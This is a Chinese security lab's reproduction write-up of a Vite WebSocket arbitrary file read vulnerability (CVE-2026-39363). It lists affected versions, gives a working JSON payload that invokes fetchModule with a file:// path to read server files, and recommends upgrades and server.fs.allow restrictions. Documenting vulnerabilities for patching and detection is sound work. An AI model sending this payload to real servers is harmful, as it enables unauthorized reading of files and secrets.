文章总结： Vite6.0.0至8.0.4等版本存在WebSocket路径访问控制漏洞，攻击者通过vite:invoke指令调用fetchModule方法，利用file://协议绕过HTTP限制实现任意文件读取。影响版本包括8.0.0-8.0.4、7.0.0-7.3.1、6.0.0-6.4.1及更低版本。修复建议包括升级补丁、生产环境禁用DevServer、配置server.fs.allow限制目录访问。 综合评分： 85 文章分类： 漏洞分析,WEB安全,漏洞预警,解决方案,安全工具

【成功复现】Vite WebSocket任意文件读取漏洞(CVE-2026-39363)

原创

弥天安全实验室 弥天安全实验室

弥天安全实验室

2026年4月9日 12:29 陕西

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Vite是Vite开源的一种新型的前端构建工具。

Vite 6.0.0至6.4.2之前版本、7.3.2之前版本和8.0.5之前版本存在访问控制错误漏洞，该漏洞源于WebSocket路径缺少访问控制，通过该 WebSocket 通道发送vite:invoke指令调用fetchModule方法，构造file://协议的任意文件路径并携带raw参数，成功绕过 HTTP 接口的访问限制，实现未授权读取服务器上任意文件的目的。

0x02影响版本

8.0.0 ≤ Vite ≤ 8.0.4        7.0.0 ≤ Vite ≤ 7.3.1        6.0.0 ≤ Vite ≤ 6.4.1        Vite ≤ 0.1.15

0x03漏洞复现

1.运行漏洞环境

npm run dev -- --host

访问环境

2.漏洞复现

1、获取websocket接口

2、发送payload，成功读取文件内容

{  "type": "custom",  "event": "vite:invoke",  "data": {    "id": "invoke_0",    "name": "fetchModule",    "data": ["file:///C:/Windows/win.ini"]  }}

3、请求流量

3.python工具测试漏洞存在

已输出检测双向规则

0x04修复建议****

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

临时缓解方案

1、在 WAF、IDS/IPS 中部署基于 POC 的检测规则，识别针对该漏洞的探测与攻击行为。

2、生产环境不要运行 Dev Server，避免使用 --host 暴露服务。

3、限制 server.fs.allow

// vite.config.jsexport default defineConfig({  server: {    fs: {      strict: true,      allow: ['.']  // 只允许项目根目录    }  }})

建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！

https://github.com/vitejs/vite/releases https://github.com/vitejs/vite/security/advisories/GHSA-p9ff-h696-f583https://github.com/Firebasky/CVE-2026-39363

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫，

予以风动，

必降弥天之润！

弥  天

安全实验室

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：弥天安全实验室 弥天安全实验室 弥天安全实验室《【成功复现】Vite WebSocket任意文件读取漏洞(CVE-2026-39363)》